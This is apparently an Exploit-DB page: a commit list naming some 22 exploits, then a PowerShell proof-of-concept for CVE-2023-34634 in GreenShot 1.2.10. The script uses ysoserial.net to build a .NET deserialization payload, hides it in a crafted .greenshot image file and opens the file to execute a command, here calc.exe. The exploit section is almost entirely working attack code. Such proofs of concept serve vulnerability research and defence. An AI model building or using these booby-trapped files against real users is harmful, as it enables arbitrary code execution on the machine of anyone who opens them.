c18d9953a2
22 changes to exploits/shellcodes/ghdb Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS) Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities Joomla HikaShop 4.7.4 - Reflected XSS Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS mooDating 1.2 - Reflected Cross-site scripting (XSS) October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated) PaulPrinting CMS - (Search Delivery) Cross Site Scripting Perch v3.2 - Persistent Cross Site Scripting (XSS) RosarioSIS 10.8.4 - CSV Injection WordPress Plugin AN_Gradebook 5.0.1 - SQLi Zomplog 3.9 - Cross-site scripting (XSS) zomplog 3.9 - Remote Code Execution (RCE) copyparty 1.8.2 - Directory Traversal copyparty v1.8.6 - Reflected Cross Site Scripting (XSS) GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
42 lines
No EOL
2.1 KiB
PowerShell
42 lines
No EOL
2.1 KiB
PowerShell
# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
|
|
# Date: 26/07/2023
|
|
# Exploit Author: p4r4bellum
|
|
# Vendor Homepage: https://getgreenshot.org
|
|
# Software Link: https://getgreenshot.org/downloads/
|
|
# Version: 1.2.6.10
|
|
# Tested on: windows 10.0.19045 N/A build 19045
|
|
# CVE : CVE-2023-34634
|
|
#
|
|
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
|
|
# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
|
|
# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
|
|
# will lead to arbitrary code execution
|
|
#
|
|
# Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
|
|
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw
|
|
#load the payload
|
|
$payload = Get-Content .\payload.bin -Encoding Byte
|
|
# retrieve the length of the payload
|
|
$length = $payload.Length
|
|
# load the required assembly to craft a PNG file
|
|
Add-Type -AssemblyName System.Drawing
|
|
# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
|
|
$filename = "$home\poc.greenshot"
|
|
$bmp = new-object System.Drawing.Bitmap 250,61
|
|
$font = new-object System.Drawing.Font Consolas,24
|
|
$brushBg = [System.Drawing.Brushes]::Green
|
|
$brushFg = [System.Drawing.Brushes]::Black
|
|
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
|
|
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
|
|
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
|
|
$graphics.Dispose()
|
|
$bmp.Save($filename)
|
|
|
|
# append the payload to the PNG file
|
|
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline
|
|
# append the length of the payload
|
|
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
|
|
# append the signature
|
|
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
|
|
# launch greenshot. Calc.exe should be executed
|
|
Invoke-Item $filename |